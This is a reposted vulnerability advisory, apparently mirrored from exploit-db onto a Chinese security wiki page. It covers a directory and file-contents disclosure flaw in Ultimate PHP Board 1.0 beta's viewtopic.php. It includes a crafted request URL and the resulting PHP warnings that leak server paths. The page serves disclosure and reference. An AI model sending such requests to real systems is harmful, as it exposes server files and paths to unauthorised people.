Ultimate PHP Board 1.0 final Beta – ‘viewtopic.php’ Directory Contents Browsing

Ultimate PHP Board 1.0 final Beta – ‘viewtopic.php’ Directory Contents Browsing

漏洞ID 1053636 漏洞类型
发布时间 2002-11-08 更新时间 2002-11-08
图片[1]-Ultimate PHP Board 1.0 final Beta – ‘viewtopic.php’ Directory Contents Browsing-安全小百科CVE编号 N/A
图片[2]-Ultimate PHP Board 1.0 final Beta – ‘viewtopic.php’ Directory Contents Browsing-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22075
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6334/info

Ultimate PHP Board (UPB) is a freely available, open source PHP Bulletin Board. It is available for the Unix and Linux operating systems.

Under some circumstances, it may be possible to disclose the contents of directories. By passing a malicious request to the viewtopic.php script, UPB may return a listing of the directory. This could be futher refined to disclose the contents of selected files.

Input:
http://example.com/phorum/viewtopic.php?id=some_shit&t_id=2

Output:
Warning: Unable to access ./data_dir/some_shit.dat in
/home/samcom/public_html/public/messageboard2/textdb.inc.php on
line 240

..

Warning: Supplied argument is not a valid File-Handle resource
in /home/samcom/public_html/public/messageboard2/textdb.inc.php
on line 241

相关推荐: IBM AIX Navio NC netstation.navio-com.rte脚本输出错误漏洞

IBM AIX Navio NC netstation.navio-com.rte脚本输出错误漏洞 漏洞ID 1207174 漏洞类型 未知 发布时间 1999-01-29 更新时间 1999-01-29 CVE编号 CVE-1999-1546 CNNVD-I…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享